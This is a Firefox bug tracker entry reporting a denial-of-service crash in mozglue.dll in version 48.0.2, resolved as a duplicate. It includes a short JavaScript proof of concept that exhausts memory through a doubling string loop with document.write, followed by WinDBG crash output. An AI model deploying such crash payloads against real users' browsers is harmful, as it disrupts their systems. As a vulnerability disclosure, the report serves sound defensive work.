Firefox Browser 48.0.2 - (mozglue.dll) Denial Of Service Vulnerability

RESOLVED DUPLICATE of bug 380223

Status

()

Firefox
Untriaged
RESOLVED DUPLICATE of bug 380223
a year ago
a year ago

People

(Reporter: Benjamin Kunz Mejri, Unassigned)

Tracking

48 Branch
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Reporter)

Description

a year ago
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Build ID: 20160823121617

Steps to reproduce:

PoC:
<body onload="javascript:VulnerabilityLab();"></body> 

<script>
  
function VulnerabilityLab() {
  
var buffer = 'x41';
for (i =0;i<1337;i++) {
buffer+=buffer+'x41';
document.write('<html><marque><h1>'+buffer+buffer);
}
  
}
</script> 


--- Debug Session Logs [WinDBG] ---
Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=5dee0a3e edx=00000000 esi=6e837466 edi=00ce70ce
eip=6e82efe5 esp=00ce7088 ebp=00ce70d4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:Program FilesMozilla Firefoxmozglue.dll - 
mozglue!mozalloc_abort+0x2c:
6e82efe5 cc              int     3
mozglue!mozalloc_abort+0x2c:
6e82efe5 cc              int     3
6e82efe6 6a03            push    3
6e82efe8 c7050000000021000000 mov dword ptr ds:[0],21h
6e82eff2 ff151060836e    call    dword ptr [mozglue!double_conversion::DoubleToStringConverter::ToFixed+0xf96 (6e836010)]
6e82eff8 50              push    eax
6e82eff9 ff155c60836e    call    dword ptr [mozglue!double_conversion::DoubleToStringConverter::ToFixed+0xfe2 (6e83605c)]
6e82efff cc              int     3
mozglue!mozalloc_handle_oom:
6e82f000 55              push    ebp
lmvm mozglue
start    end        module name
6e820000 6e83d000   mozglue    (export symbols)       C:Program FilesMozilla Firefoxmozglue.dll
    Loaded symbol image file: C:Program FilesMozilla Firefoxmozglue.dll
    Image path: C:Program FilesMozilla Firefoxmozglue.dll
    Image name: mozglue.dll
    Timestamp:        Wed Aug 24 06:53:43 2016 (57BD2857)
    CheckSum:         0001E87D
    ImageSize:        0001D000
    File version:     48.0.2.6079
    Product version:  48.0.2.6079
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0000.04b0
    CompanyName:      Mozilla Foundation
    ProductName:      Firefox
    InternalName:     Firefox
    OriginalFilename: mozglue.dll
    ProductVersion:   48.0.2
    FileVersion:      48.0.2
    FileDescription:  48.0.2
    LegalCopyright:   License: MPL 2
    LegalTrademarks:  Mozilla
    Comments:         Mozilla


Actual results:

Opening the poc code as html allows remote attackers to crash the mozilla firefox browser and firefox os via mozglue.dll.


Expected results:

The script loop exception should capture the process to protect against uncaught exceptions, bofs or other read/write access violations.

Updated

a year ago
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: a year ago
Resolution: --- → DUPLICATE
Duplicate of bug: 380223
You need to log in before you can comment on or make changes to this bug.